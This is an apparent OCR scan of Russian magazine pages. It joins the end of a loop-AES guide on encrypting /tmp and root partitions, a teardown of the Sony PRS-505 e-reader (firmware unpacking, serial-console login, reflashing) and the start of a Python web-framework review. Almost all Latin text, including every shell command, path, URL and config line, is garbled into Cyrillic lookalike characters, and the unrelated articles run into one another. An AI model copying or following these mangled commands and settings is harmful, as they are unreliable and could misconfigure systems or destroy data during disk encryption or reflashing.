РаззрЬгазе зеесіз, тиШріе ЬазЬ ісегаііопз, М05 IV апсі иве оі аИегпаііпд 
епсгурсіол кеуз, 

Епсгурііоп кеуз сап Ье зюгей іп а СпиРЗ-епсгуріесі кеуТіІе, ѵѵЬісЬ аііоѵѵз іЬе 
раззрЬгазе ю Ье сьапдей ѵуітоиі ге-епсіурііоп. Кеуіііез сап аізо Ье епегуршь 
азуттейгісаііу Гог тиій-изег ассезз. 

ТЫв раскаде іпсіийез Ше сірЬег гтюйиіез ЫоѵѵйзЬ, іѵѵоіізЬ апсі вегрет Іп 
асЕйійоп іо Ше йеіаиіі сірЬег (АЕ8). 

Мойиіез сотрііесі Тгот іЬіз раскаде гедиіге тоипі иШз ѵѵіШ зирроп Юг 
Юор-АЕЗ іо ѵѵогк соггесііу, ЗисЬ иіііз аге ргоѵісіесі іп (Ье раскаде Чоор- 
аез-иШзк 

СННег Раскадез КеІаіесІ іо Іоор-аев-зоигсе 

| •” йерёіійі] ■ гесоштепсіі о меде$в| 



Ыпкз Іог 
Іоор-аез-зоигсе 



ІіЪипІи Кезоигсез: 

* Вид Йеропв 

* ЦЬити сИаодеІод 

* СорупдШ Рііе 

□<лѵпІоасІ воигее Раскаде 
[оор-аев : 

* Поор-аез 3 , 2 с- 
2.Дьс] 

* Роор- 

аев 3.2с.опд.іаг.дг| 

* [кюр-аев з.гс- 
2Жш\ 



Маіпіаіпег: 

• ЦЬипш моти 
РеѵеЕореге 
СМаІІ АгсЫѵе) 

р|еа$е соп$йег йііпд а Ьид 

йшМшшйшйм 




Чтобы зашифровать катал огДтр (или любой другой) таким 
способом, просто размонтируй его (итоипі/Ітр), добавь в/ 
еІсЛзІаЬ следующую строку: 

/сІеѵ/зсІаЗ /Сшр ехС2 (іеіаиікз , 1оор=/сіеѵ/1оорЗ , е 
псгурРіоп=АЕ812 8 ,рЬазк=гапс!от/1777 О О 

и смонтируй каталогенова: 

# шоипС /Стр 

Команда тоипі: не спросит пароля, а просто подключит/ 
беѵ/ІоорЗ кустройству/беѵ/збаЗ, создаст новую файловую 
систему, сгенерируетбб случайных ключей и воспользу- 
ется ими для шифрован ия записываемых да иных. Права 
на каталогДтр будут выставлены в значение 1777 (опция 
«рбазЬ=гапсІопп/1 777»), 

Обрати внимание, что выбор файловой системы ехі2 в этом 
случае нетребование, а просто здравый смысл. Зачем 
использовать журналируемую файловую систему в ситуации, 
когда ФС заново создается при каждом монтировании? 

СЦЕНАРИЙ 4. ШИФРОВАНИЕ 
КОРНЕВОГО РАЗДЕЛА 

Четвертый и заключительный сценарий использования Іоор- 
АЕЗописываетпроцесс настройки системы для шифрования 
корневого раздела. Сразу оговорюсь, что это непростая проце- 
дура, которая потребует создан ия каталога /Ьооі на отдельном 
разделе и наличия под рукой ЫѵеСО или отдельно стоящего 
дистрибутива Ыпих. В основе метода лежит использование 
небольшого образа іпіітсі, который еще до загрузки запустит 
утилиты ІП5І7ЮСІ и Іозеіир, располагающиеся в каталоге /Ьооі, 
для подключения шифрующего Іоор-устройства поверх корне- 
вого раздела еще до фактической загрузки системы. 

1 . Первое, что необходимо сделать, — это скачать и устано- 



вить б іеШЬс, ми нимал истинную библиотеку языка Си, код 
которой будет использован в образе іпіітсі: 

# ссі /изг/зге 

# мдеР іРр :/ /іРр . кегпеі . огд/риЬ/1іпих/1іЬз/ 
сііеТІіЬс/сііеЦІіЬс-О . 32 . Таг .Ьз2 

# Таг -хз^ (ііеЦІіЬс-0 . 32 . Таг .Ьз2 

# ссі с1іе1і1іЪс-0 . 32 

# таке 

# іпзкаіі Ьіп-і38б/сЗіеР /изг/ІосаІ/Ьіп 

2. Также нам понадобится утилита аезріре, с помощью 
которой мы зашифруем существующие на корневом разделе 
данные, не потеряв их: 

# ссі /изг/зге 

# мдеС ТШРр: //Іоор-аез . зоигееіогде . пек/ 
аезріре- Іакезк . Саг . Ъг2 

# ссі аезріре-ѵ2 . Зе 

# СРЬАС8="-02" ЬБРЬАС8= ,, -з какіе -з" ./ 
сопкідиге 

# таке 

# таке кезкз 

# ср -р аезріре /Ъоок 

3. Статически соберем утилиту дрд, чтобы она независела от 
библиотек, расположенных в корневом разделе: 

# ссі /изг/зге 

# мдек ккр : / /ккр . дпирд . огд/дегурк/дпирд/дпирд- 

1.4.9. Таг . Ът.2 

# Таг -х^к дпирд-1 . 4 . 9 . Таг .Ьг2 

# ссі дпирд-1 .4.9 

# раТсЬ -рі </изг/згс/1оор-АР8-ѵЗ . 2д/дпирд- 

1.4.9. сіііі 




> СІѴСІ 

Для большего 
удобства мы собрали 
все необходимые 
команды в файл 
і т_1: о о_1а гу_1: о_1:у р е_ 
ІСМ. Вместо набора 
команд тебе будет 
достаточно делать 
сору’п’разіе. 




> іпіо 

Во многих дистри- 
бутивах утилиты и 
драйвер 1оор-АЕ5 
можно установить 
средствами пакетно- 
го менеджера, однако 
ядро придется пе- 
ресобирать в любом 
случае. 




> іпіо 



• Описанная в статье 
утилита аезріре — это 
отличный инстру- 
мент, который можно 
испол ьзовать для 
получения доступа 
кзашифрованному 
устройству отовсюду, 
например из ЕгееВСО. 

• В отличие от других 
систем шифрования, 
драйвер 1оор-АЕ5 
поддерживает 
прямую и обратную 
совместимость с бо- 
лее ранними ядрами 
(вплоть до ветки 2.0) 
и может работать с 
томами, зашифро- 
ванными еще самыми 
первыми версиями 
драйвера89 
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Настраиваем сборщик 
образа іпіітсі 




# СЕЬАС8= " -02 " ЬБРЬАСЗ = " - з к ак і с -в" 

. /сопкідиге --ргекіх=/изг --епаЫе- 
зкакіс-гпс!=1іпих 

# таке 

# гт -к /изг/зЬаге/тап/тапІ/ 
{дрд,дрдѵ} . 1 . дг 

# таке іпзкаіі 

# скюѵт гоок : гоок /изг/Ьіп/дрд 

# сктосі 47 55 /изг/Ьіп/дрд 

Заметь, если каталог/изг/Ьіп находится не на 
корневом разделе, бинарникдрд придется 
переместить в каталог/Ьіп: 



# сЬ /изг/Ьіп 

# тѵ дрд . . / . . /Ьіп 

# 1п -з . . / . . /Ьіп/дрд дрд 




4. Скопируем модуль Іоор.ко в каталог/Ьоор что- 
бы он был доступен до монтирования корневого 
раздела: 

# ср -р /1іЬ/тоЬи1ез/2 . б .28 . 9- 
поіоор/ехкга/іоор. ко /Ьоок/тоЬиІез- 
2.6.28. 9-по1оор/ 

5. Как и прежде, создадим 65 случайных ключей, 
которые будут использованы для шифрования 
корневого раздела: 

# шпазк 077 

# кеасі -с 37 05 /сіеѵ/гапсіот | ииепсосіе 
-т — | ЬеаЬ -п 66 I каіі -п 65 \ 

I дрд --зуттекгіс -а >/Ъоок/ 
гооккеу . дрд 

6. Подготовим образ іпіітсі. Для этого переходим 
в каталоге исходниками Іоор-АЕ5 (/изг/зге/ 
Іоор-АЕ8-ѵ3.2д], открываем файл ЬиіШ-іпТгб.зб 
в текстовом редакторе и исправляем несколько 
переменных: 



НАСТРОЙКА ВШЮ-ШІТК0.5Н 

# Использовать метод іпікгаткз/ 
зѵ\гікс1і_гоок 

# для переключения на зашифрованный 
корневой раздел 

ІЛЗЕРІѴОТ=2 

# Раздел, хранящий каталог /Ьоок 
ВООТБЕ Ѵ= / Ье ѵ / з Ьа 1 

# ФС Ьоок-раздела 
ВООТТУРЕ=ехкЗ 

# Корневой раздел 
СКУ РТКООТ = / Ье ѵ / з Ьа 2 

# ФС корневого раздела 



X 



Драйвер Іоор-АЕЗ, не напрягаясь, обгоняет б т-сгурі: как при работе 
сфайлами[слева),такив тестах іоіезі: [справа) 



ЯІез^ез*. сІеасШпе зсЬесІиІег 




КООТТУРЕ=ехкЗ 

# Метод шифрования (АЕ8128/АЕ8192/ 
АЕ3256 ) 

СІРНЕКТУРЕ=АЕ312 8 

# Клавиатура в режиме ЕТЕ-8. Это важ- 
но , если 

# пароль к ключам содержит нелатинс- 
кие символы 

1ТГЕ8КЕУВМСЮЕ=1 

Отредактируем конфигурационный файл дгиб (/ 
ЬооіУдгиЬ/тепи.ІзІ:], чтобы записьо нашем ядре 
выглядела примернотак: 

#ѵі/ЬооІ/дгиЬ/тепи.І5І 

кікіе Шипки 9.04, кегпеі 
2.6.28. 9-по1оор 
гоок (ЬсЮ,0) 

кегпеі /Ьоок/ѵт1іпи2-2 . 6 . 28 . 9- 
поіоор 

іпікгЬ /іпікгЬ.д 2 

Наконец, установим образ іпіігсі и набор необхо- 
димыхутилит(1озе1:ир, например] в каталог/ЬооЬ 

# . /Ъиіісі-іпікгсі . зЬ 

7. Дело за малым: загрузиться с ЬіѵеСО (либо 
другого дистрибутива], создать несколько фай- 
лов устройств (которых может не быть до запуска 
ибеѵ] и зашифровать содержимое корневого 
раздела. Монтируем корневой раздел хост-сис- 
темы (здесь и далее /беѵ/бба2]: 

# тошік /сіеѵ/Ьс іа2 /тпк 

Открываем /тпДеІсЛзІаЬ и заменяем «/беѵ/ 
Ма2 / ехіЗ сіеіаиііз 0 1 » на «/беѵДоорб/ ехіЗ 
(МаиІізО 1». Два важныхзамечания: необходи- 
мо использовать именно/беѵДоорб, — это имя 
прошито в іпіітсі; в ІІЬипШ и некоторых других 
дистрибутивах вместо имени корневого раздела 
может быть у казан его ІІІІЮ (уникальный иден- 
тификационный номер, используется для того, 
чтобы ядро могло найти корневой раздел, даже 
если жесткий диск будет подключен кдругому 



каналу/компу]. Теперь проверим на существо- 
вание нескольких файлов устройств (нужны для 
работы утилит, помещенных в каталог/Ьоо!:]: 

# 1з -1 /тпк/сіеѵ/ {сопзоіе , пиіі , гего} 
Если таковых не существует — создадим их: 

# ткпоЬ -т 600 /тпк/Ьеѵ/сопзоІе с 5 1 

# ткпоЬ -т 666 /тпк/сЗеѵ/пиІІ с 1 3 

# ткпосі -т 666 /тпк/сіеѵ/гего с 1 5 

Отмонтируем корневой раздел: 

# штюипк /тпк 

# зупс 

И смонтируем ЬооЬраздел (тоипк -г/сІеѵ/ЬсІа 1 / 
тпі], чтобы воспользоваться утилитой аезріре для 
шифрования содержимого корневого раздела: 

# ЬЬ ік=/сІеѵ/Ьс1а2 Ьз = 64к \ 

I /тпк/аезріре -е АЕ3128 -К /тпк/ 
гооккеу. дрд -С/Х 

I сМ ок=/с!еѵ/ккіа2 Ьз=64к 
сопѵ=покгипс 

Уффф, это все, перезагружаемся и наслаждаем- 
ся безопасностью: 

# штюипк /тпк 

# зупс 

# геЬоок 

ЗАКЛЮЧЕНИЕ 

Каквидишь, Іоор-АЕ5 нетакуж и сложен вуста- 
новке и достаточно прост в использовании (за 
исключением четвертого сценария, конечно]. 

С помощью этого незамысловатого драйвера 
можно зашифровать зѵѵар, разделы, файлы, 
флеш-накопители и даже С0-П0М. В пакете с 
исходниками драйвера ты найдешь подробное 
руководство, описывающее, кроме всего проче- 
го, процесс настройки шифрования файловой 
системы загрузочного флеш-брелка и создания 
безопасного иѵеСР ~;-г 
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■ «ЕВГЕНИЙ «Ѵ5 НМ ІІК» Б ЕЙ С ЕМ БАЕВ / ОІѴЕКгаЕОи.ІОРРЕ.КЩ ІСО 308229460 / 




ЕЬоок-потрошитель 



Применяем хирургию, чтобы раскрыть секреты 
5опу Воокгеасіег РВ5-505 




Вокруг нас полно гаджетов с Ыпих на борту, и никто не меша 
етучиться на ошибках профессионалов, вскрывая гаджеты 
и изучая. Мной была куплена «игрушка» — книгочиталка на 
электронных чернилах 5опу ВоокРеасіег РР5-505* 

X 

Букридер 
почти в 
сборе 



Н аша цель — посмотреть, как исполь- 
зуется Линукс во «взрослых», мас- 
совыхустройствах, оценить находки 
«тамошних» профессиональных л и- 
нуксоидов, поднабраться опыта в исследовании 
чужого софта, а может, и добавить в устройство 
что-то свое. 

ОФФЛАЙН 

Итак, сначала проведем оффлайновый осмотр 
внутренней программы. Производитель элек- 
тронных книгпериодически выкладываетна 
официальный сайтсвежие прошивки, исправ- 
ляющиестарые глюки и добавляющие новые. 
Чтобы не потрошить содержимое ЛазЬ-ка рточек 
устройства, просто скачаем новую версию 
[ ЬЛрУ/боѵѵпІоаб.зопѵ.сопп/ргз/ргз-бОб/ 
1.1.00.18040/РР5-505%20ЦрсІа1ег%201.1 .00.18040. 
ехе ). Это программа, которую производитель 
нам предоставил для перепрошивки ридеров. 



Она содержитобраз файловой системы для 
заливки вустройство. Экзешник— всеголишь 
самораспаковывающийся архив ѴѴіп-2ір, и его 
совсем необязательно запускать, достаточно 
просто распаковать Ііпих-утилитой ипгір: 

$ ипгір РЕЗ-505Х 

Брс1аДег\ 1 . 1 . 00 . 18040 . ехе 

Помимо вспомогательных сИІ-ек и конфигура- 
ционных файлов хтІ(к ним мы еще вернемся), 
в распакованном архиве будутжить нужные 
образы ФС, которые и заливаются в итоге в 
устройство. Они имеют расширение *.ітд. 
Пропустим эти имиджи через программу Ліе и 
посмотрим, что она о них думает: 

$ Дііе * . ішд 

сгатДз . Рзк. ітд : Біпих Сотргеззесі 

КОМ Рііе ЗузДет сіаДа, ІіДДІе епсііап 



зіге 65536 СЕС 0хсЗе97789, есІіДіоп 
2768907732 , 3306537355 Ыоскз , 
1718735798 Дііез 

сгатДз . ЕооДДз . ітд : Біпих Сотргеззесі 
ЕОМ Рііе ЗузДет сіаДа, ІіДДІе епсЗіап 
зіге 65536 СЕС 0хс1М1801Д, есііДіоп 
3444324402, 23 643 02 859 Ыоскз , 
491549572 Дііез 

гам. ВооДІтд . ітд : БОЗ ехесиДаЫе 

(сіеѵісе сігіѵег) Дог БОЗ 

Содержимое третьего файла показалось мне 
подозрительным, это был явно не ДОС-драйвер. 
Размер — 480 тысяч байт, почти полностью за- 
бит единичками (для более быстрого залива во 
флеш, какя полагаю) и имеет некоторое коли- 
чество вкраплений чего-то малоосмысленного. 
Сначала я решил, что это какой-то загрузчик 
(истинное назначение станетясным позднее). 
Файлы сгатІз.Рзк.ітд и сгатІз.ПооІіз.іппд, 
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V 

Подпаялся к 
отладочному 
порту. Ахтунг! 
Контакт 6ІМР на 
этой фотке за- 
паян нетам! Это 
мой косяк 



очевидно — образы файловыхсистем в форма- 
те СгатРЗ. Попробуем ихсмонтировать: 

$ тксііг Рзк. РЗ 
$ сЛ Рзк . РЗ 

# тошік -к сгаткз -о Іоор . . /сгаткз. 
Рзк . ітд . 

Внутри — каталогзопу/еЬоок, а в нем — под- 
каталоги арріісаііоп, Ьіп и ЕОІЧТ. Заглянем в 
первый иувидим кучу динамических библио- 
тек, скомпилированных под архитектуру а гтеі, 
и кучку вездесущих хт [-файлов. В каталоге/ 
Ьіп — 4бинарника, а в ЕОІЧТ — шрифты. 

Теперь примонтируем файл сгагтЛз.ПооЛз. 
ітд. В нем — полноценная файловая система 
01\Ю с каталогами: Ьіп, Оа[а, беѵ, е[с, Ьоте, ІіЬ, 
тпі, ор[, орШ, ор[1 , ргос, гоор зЬіп, [тр, изг, ѵаг. 
Что же интересного здесь можно накопать? 



Ну, во-первых, содержимое файла Мс/іззие 
даст нам версию окружения Ьіпих — коммер- 
ческий проект Моп[аѴіз1;а версии 3.0 [ ѵѵѵѵѵѵ. 
тѵізіа.сот ]. Файлы Мс/раззѵѵсІ и /еіс/зибоегз 
расскажут о единственном пользователе этой 
системы: «ІіЬго»сзашифрованным паролем 
«/ЕТЗтддсЕІ ІЧТСІ». Подкатал о г /еіс/гс.сі 
обозначит все сервисы и демоны, которые 
запускаются в устройстве. Здесь все стандарт- 
но, если бы не спрятавшийся в гсЗ.б скрипт 
5201іЬготоипТ Заглянув в него, можноузнать, 
что он монтирует файловые системы (в/орі ,/ 
орШ и/ор[1], подгружает драйвера экранчика, 
звука, изЬ-зФгаде и ЛазЬ-карточек, выводит 
наружу приветствие и устанавливает дефолт- 
ное время. В общем, все, отчего зависит книго- 
читалка, делается здесь. 

Я чуть было не ушел из подкаталога /е[с дальше 
по файловой системе, но в последний момент 
заметил скриптикгс.б/гс3.б/5981іЬгоз1:агЕ кото- 






рый запускает файл ЬпуЫТр.зЬ, живущий в пре- 
дыдущей изученной нами файловой системе. А 
вотздесьуже интересно. Зачем устройству, не 
имеющему никакого сетевого интерфейса, ка- 
кой-то ЬЛр? Ладно, берем на заметку и ползем 
по файловой системе дальше. 

Некоторый интерес вызвал драйвер хвале- 
ных электронных чернил [ ЬЛрУ/ги.ѵѵікіребіа. 
огд/ѵѵікі/ЕІпк ].живѵщий по адресу /ІіЬ/ 
тобиІез/2.4.1 7_п1 2/кегпеІ/сІ гіѵегз/ѵісіео/ 
еФаскШ.о. Поиск последовательностей А5СІІ- 
символов в этом двоичном файле (команда 
«зІтіпдзеІтаскіЪ.о»] дал следующий результат: 

кегпе1_ѵегзіоп=2 . 4 . 17_п12 
аикког=Е Іпк 

Лезсгіркіоп=8кгаск РгатеВиТТег 
Бгіѵег 

ѴСА е-іпк 600x800 

Следовательно, электронные чернила 
представляются Линуксу как графический 
ЕгатеЬиЛег-совместимый дисплей! Такчто, 
если захотим похачить устройство и заста- 
вить выводить на экран что-то, отличное от 
книжек, — надолишьнаправлятьвыводнашей 
графической программы в/беѵЛЬО. Проявля- 
ется и смысл файла гаѵѵ.ВооОтд.ітд — это то, 
что отсылается во фреймбуффер при загрузке 
ОС, то есть картинка с логотипом и надписью 
«ЗіагЬпд ІЭр...». Размер файла какраз равен 
800x600 (=480000), по байту на пиксель. 

Одно из особенностей устройства — разработ- 
чики физически поместили на разные файло- 
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Подключение 
к компьютеру 

вые системы собственно ОІМІІ (какуниверсаль- 
ный софт] и устройство-зависимую оболочку 
Рзк — то, что и делает букридер букридером. 
Сделано, это чтобы можно было быстро зали- 
ватьобновления кпрограмме чтения, нетрогая 
систему целиком и повышая ее безопасность. 

РАЗБИРАЕМ... 

Внутренности устройства уже давно исследо- 
ваны товарищами ідогзк, Ьогосіа и остальными 
энтузиастами с форума ѵѵѵѵѵѵ.ібе-еЬоок.огд/ 
1югипп/ѵіеѵѵІ:оріс.рЬр?1:=7577 . Нам осталось 
только повторить их подвиг, благо, инструкция 
по разборке там имеется. 

Сзамиранием сердца разбираю своего хороше- 
го друга и внутри обнаруживаю: 

• Центральный процессор РгееЗсаІе 
(БгадопЬаІІ) МХ-1 с архитектурой 
АКМ926 

• Микросхема КАШ-РІазЬ памяти 
Зашзипд (256 МЪ) 

• Микросхема ШК-РІазЬ. памяти 
Зрапзіоп (2 МЬ) 

• Две микросхемы оперативной памяти 
Зашзипд 

• Контроллер карт ЗБ/ММС+МешогуЗСіск 
КісоЪ. 

• Контроллер дисплея на РРСА Аскеі 
РгоАЗІСЗ 

• Цифро-аналоговый преобразователь 
для вывода звука 

• Контроллер ІІЗВ Ррзоп 31К72Ѵ17 

• Распайка под проприетарный отла- 
дочный разъем (100 ножек) , маркиро- 
вана как СРГ1501 

Итак, никакого чуда или крутой инженерной на- 
ходки внутри букридера нет. Видим микросхему 
ІЧОР-памяти, в которой, скорее всего, живут за- 
грузчик и ядро, потому как именно этоттип РІазЬ 
умеет читать отдельно заданный байт(ВапсІопп 
Ассезз]. Рядом — ІЧАШ-ПазЬ, где, очевидно, 
живутфайловые системы и, собственно, сами 
книжки. Лично меня порадовала 50РАМ-память 
в маленьких ВОА-корпусах. Тем самым инжене- 
ры нехило сэкономили место на плате. 

Вообще, компоновщикам платы и дизайнерам 
корпуса моя похвала и зависть. Все подогнано 
неимоверноточно, и нигде незаметно расточи- 
тельства. Впихнуть в корпус что-нибудь, кроме 
того, что в нем есть, мне показалось невозмож- 
ным. Короче, ни добавить, ни отнять. 

Разберемся с отладочным разъемом. Очевидно, 
на него выводятся ЛАО-интерфейсы микросхем 
+ какие-нибудь порты, типа последовательного 
отладочного ЮАРТ’а с центрального процес- 
сора. Так и есть. Ребята с форума, названного 
выше, уже сделали грязную работу, в виде 
тыкания осциллографом, и вычислили принад- 
лежащие ЭВО-порту ножки. Осталосьтолько к 
ним подпаяться. Припаиваемтонкие серебря- 
ные провода к 6(Т гапэтМ:] и 7(Ресеіѵе] пинам, 
а также незабываем про «земляной» контакт, 
который можно взять или от 5-го пина разъема 




или — просто схватившись за корпусустройства. 
Через переходник Р5-232/ІІАРТ подключаем к 
СОМ-порту компьютера. 

ОНЛАЙН 

Включаем устройство. Если порт настроен пра- 
вильно и все запаяно аккуратно, то наблюдаем 
логзагрузки Линукса. Какзагрузка законче- 
на, —логинимся с узнанными из/еію/раззѵѵсі 
реквизитами (ІіЬго: ІіЬгіе]. Система пускает нас и 
вываливает сообщение: 

### кзкЬоаб 
### кзкЬоабесІ 

Іакезк пЫсопкід геаб кгот 0x00036800 
Іакезк пЫсопкід мгіккеп ко 
ОхОООЗсООО 

#### хз_зміксЦег_изШакс]іег_ 
епбЮЗВТЬгеаб 

# магпіпд: дІоЬаІ іпзкеасі о к Іосаі ! 

# магпіпд: дІоЬаІ іпзкеасі о к Іосаі! 
ЗУЗЫРМ: зузпрш_рт_са11Ьаск ( ) : 163 
Мет, СРЮ зкорріпд. . . 

После чего перестает отвечать на команды! Все 
хорошо, так и должно быть, это процесс-оболоч- 
ка ЬпуЫір заметила неактивность процессора 
и вырубила его, чтобы сэкономить аккумулятор. 
«Расшевелить» процессор можно, понажимав 
на кнопки громкости. Работатьтак сложно, 
поэтому убиваем лишнее: 

$ кіііаіі кіпукккр . зЪ. 

$ кіііаіі кіпуЪ.ккр 

С этого момента нам доступна настоящая, 
полноценная система ОІЧІІ/Гіпих на ядре 
2.4! 

Из лога загрузки (команда сітезд) можем 
узнать многое об аппаратной части девайса: 
например, что размер оперативной памяти 
64 МЬ и что ЛазЬ-память разбита на очень 
много разделов на все случаи жизни. Взгля- 
нем на характеристики процессора: 

гооіга(попе):/ргос# саі /ргос/сриігЛо 

Ргосеззог : АКМ/СІККІІЗ 

Агш92 ОТзіб (мЪ) геѵ 0 (ѵ41) 

ВодоМІРЗ : 98.09 



Реакигез : змр каік 2 6Ык 

Саске куре : мгіке-Ъаск 
Саске сіеап : ср15 с7 орз 
Саске Іоскбомп : когшак А 
Саске ипікіеб : кагѵагб 

Нагбмаге : Мокогоіа 

БгадопВаІІ МХ1 (еВоок-2) 

Выходит, контроллер работает на частоте 
1 00 МГц и имеет архитектуру АР М9. 

А вот что Л и ну кс при монтировал: 

гооіга(попе):/ѵаг# тоипі 

/беѵ/гоок оп / куре сгаткз (гм) 
ргос оп /ргос куре ргос (гвд) 
ктркз оп /беѵ/зкт куре ктркз (гм) 
ктркз оп /ктр куре ктркз (гм) 
ктркз оп /ѵаг куре ктркз (гм) 
ктркз оп /екс куре ктркз (гм) 
/беѵ/ткбЫоскІО оп /оркі/кеуз куре 
сгаткз (гм) 

/беѵ/ткбЫоскІІ оп /оркі/іпко куре 
сгаткз (гм) 

/беѵ/ткбЫоск15 оп /орк куре сгаткз 
(гм) 

/беѵ/ткбЫоскІб оп /оркО куре зккз2 
(гм) 

беѵркз оп /беѵ/ркз куре беѵркз (гм) 

Кстати, то, что имеет файловую систему 
сгагтЛз — доступнотолькодля чтения. Особен- 
ность файловой системы, что бы там драйвер 
себе ни думал. 

ОБОЛОЧКА 

Каксреди файлов прошивки устройства, так и 
в приложении, поставляющемся под ѴѴіпбоѵѵз, 
можно заметить множество хті-файлов, 
какодин, начинающихся со строчки «<1зк 
хт[пз=» ЬЦр://ѵѵѵѵѵѵ.кіпота.сот/р5к/1 »>». Это 
файлы для оболочки, созданной компанией 
Кіпота и приобретенной Зопу (что мелькает в 
«титрах»]. В общем, бинарникбпуЬЛр парсит 
эти файлы и делает все, что ридеру нужно: 
рисует интерфейс, подключает библиотеки для 
разбора файлов, выполняетскрипты ит.д. На- 
звали его, конечно, странновато, но где-то даже 
логично. Нужную функциональность можно 
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Звук 




добавить в систему, не прикасаясь к компилятору. Пишем 
по образу и подобию новые конфиги или правим существу- 
ющие, потом добавляем шрифты, простенькие игры — это 
возможно! «Язык»хтІ-файлов неоченьсложен.такчто все 
в наших руках. 

Энтузиасты в интернете уже создали альтернативные 
прошивки с пакетами локализации и даже упаковали их в 
СгатРЭ-образы. Среди рекомендуемого — более читабель- 
ные шрифты, симпатичные иконки и часы в углу экрана. 
Можно не спешить заламывать конфиги, а сначала посмот- 
реть, что предлагает сообщество. Но если хочется чего-то 
своего, то расскажу, как создать образ на примере заливки 
новых шрифтов. 

"Ш- шрифты лежат в каталоге /орі/зопу/ебоок/ЕОІЧТ. В 
идеале, их надо переименовать в ЛОООЗітщ.ШДШОІ 1 т_. 

Ш, 11:041 9 т_.Ш, атакже дать внутренние имена: 

Ропб батііу - Зѵ\йз721 ВТ, тбсЬ801 Кт ВТ, СоигіегІО ВТ 
Ропб зиббатііу — Котап, Котап, Котап 
Риіі бопб пате — 8\лп_з721 ВТ Котап, Бибс1і801 Кт ВТ 
Котап, СоигіегІО ВТ Котап 

Именнотакие имена прописаны в конфигах арріісабоп/ 
ксопбд.хті и аррІісаЕоп/гезоигсез/зсгірІз/таіп.хтІ. По 
образу и подобию написанного там можно изменить предло- 
женные стили на СВОИ: 

<збу1е бопб=»Соигіег10 ВТ»> 

// Стиль для показа часов: жирный, размер 22 
<збу1е іб=»біте" зІ 2 е=" 22 " збу1е= "ЬоЫ" 
со1ог= " #РРРРРР" /></збу1е> 

<збу1е бопб = " Рибс1і801 Кт ВТ" > 

// Текст размером 12 

<збу1е іб= " СехС " зізе= " 12 " /></збу1е> 

Втехже конфигах, играясь со скриптами и разметкой, можно 
добавить возможностей в оболочку. Финальный аккорд — 
пакуем новую ФС в образ: 

# ткбз . сгатбз . /пе\ѵ_орб . /пеѵѵ_орб . ітд 

ПЕРЕПРОШИВКА 

Просто та к заменить нужный файл на обновленный сжатая 
файловая система сгагтЧз не позволяет. Надо будет ее рас- 
паковать на РС, внести изменения и с помощью ткІз.сгагтЧз 
запаковать обратно, что и было проделано в предыдущем 
разделе. Товарищ ідогзк написал набор скриптов (ІІпіѵегзаІ 
Еіазбег, качать отсюда — ѵѵѵѵѵѵ.тоЫІегеасІ.сотЛогитз/ 
зЬоѵѵ1:Ьгеаб.рЬр?1=26831 1. С их помощью можнозаменить 



Внутренности 
в подробностях 

старый образ на 
созданный, атакже 
(внимание!) заменять 
отдельные файлы, 
если хочется поэкс- 
периментировать, не 
мучаясьс компонов- 
ками образов. Просто 
скидываем кучку фай- 
лов на Еіазб-карточку, 

заменяем образ пеѵѵ_орТітд на наш, вставляем в букридер 
и перезагружаемся. Если все прошло хорошо, и ошибокв 
конфигах нет, то мы заимеем обновленный интерфейс. 

Чаще всего при заливке испорченного образа система не 
выходит из строя и дает нам шанс исправить проблему. Хотя 
иногда оболочка повреждается настолько, что без тяжелой 
артиллерии (подпаивания к отладочному порту) не обойтись. 
Но ведь остальная файловая система с ОПІИ неубита, 
поэтому с полноценной консолью несложно перепрошить 
устройство рабочей прошивкой вручную, предварительно 
залив на флешку соответствующий образ (приведенная 
ниже последовательностьдействий предложена Ьогоба): 

// Создаем временный диск в памяти объемом 32 МЪ 

гооб@(попе) :~# тоипб -о гетоипб -б бтрбз -о 

зіге=32т /беѵ/зЬт /бтр 

// Монтируем РІазЬ-карточку 

гооб@(попе) :~# ткбіг /бтр/зб_сагб 

гооб@(попе) :~# тоипб /беѵ/збтзсагсІ/г5с807а1 /бтр/ 

зб_сагб 

// Вынимаем оттуда образ во временный диск 
гооб@(попе) :~# ср /бтр/зб_сагс1/пем_орб . ітд /бтр 
// Проверяем контрольную сумму 
гооб@ (попе) : ~# шбБзшп /бтр/пем_орб . ітд 
// Проприетарный софт Зопу для низкоуровневой ра- 
боты с Ы/ШБ-бІазЬ. карточками 

гооб@(попе) :~# /изг/1оса1/зопу/Ьіп/пЫзбт беіебе 
Рзк 

гооб@(попе) :~# /изг/1оса1/зопу/Ьіп/пЫзбт сгеабе 
-і /бтр/пеѵ/_орб . ітд -б 1 Рзк 

// Сравниваем залитое 

гооб@(попе) :~# /изг/1оса1/зопу/Ьіп/пЫзбт стр -і 
/бтр/пем_орб . ітд Рзк 

гооб@(попе) :~# /изг/1оса1/зопу/Ьіп/пЫсопбід 
-кзеі погтаі 
гооб@(попе) :~# зупс 
гооб@(попе) :~# геЬооб 

ПРОСТОР ДЛЯ ЭКСПЕРИМЕНТОВ 

Привычка разбирать попадающиеся под руку(и соби- 
рать обратно!) гаджеты добавляет опыта и помогает при 
создании чего-то своего. Мы взяли устройство для чтения 
электронных книг, но вместо чтения стали исследовать его 
программную и аппаратную суть. Ладно спроектированный 
и созданный на базезнакомого и изученного Ыпих, 5опу 
Воокгеабег РР5-505 предоставляет широкий простор для 
экспериментов и творчества. ~в~ 





НТТР://ѴѴѴѴѴѴ 

■і Г 

> Ііпкз 

• Хороший сайт про 
электронные книжки 
с замечательным 
форумом — ууууууйбе- 
еЬоок.огд . 

• Еще немного све- 
дений о внутреннос- 
тях девайса: ІтЛртУ 
уѵікі.тоЫІегеаб.сот/ 
ѵѵікі/5опѵ Реабег 
баск . 




> іпіо 

• ІІАРТ — этот 
простой механизм 
позволяет последо- 
вательно передать 
несколько байт. В од- 
ном из предыдущих 
номеров журнала 
Сергей Долин под- 
робно написал о нем 
в рубрике «Фрикинг». 

• 5опу Воокгеабег 
РР5-505 — карман- 
ный компьютер, 
имеющий вместо 
стандартного ЖК или 
ОЕЕО-дисплея так 
называемый Е-іпк 
дисплей на электрон- 
ных чернилах. 
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йМИбО ф СЬеггуРу 

И КОМПАНИЯ 0 

Обзор ѵѵеЬ-фреймворков на Питоне 

В рамках этой статьи мы рассмотрим инструментарий, написанный 
на Питоне (и использующий его же), который делает работу веб- 
про грамм иста легче и приятнее — веб-фреймворк. А тонн ее, даже 
несколько самых популярных питоновских веб-фреймворков. 




ПИТОНОВСКИЕ ВЕБ-ФРЕЙМВОРКИ 

В процессе выбора веб-фреймворка для разработки сайта есть над чем 
задуматься. Если взять за критерий язык программирования, то для по- 
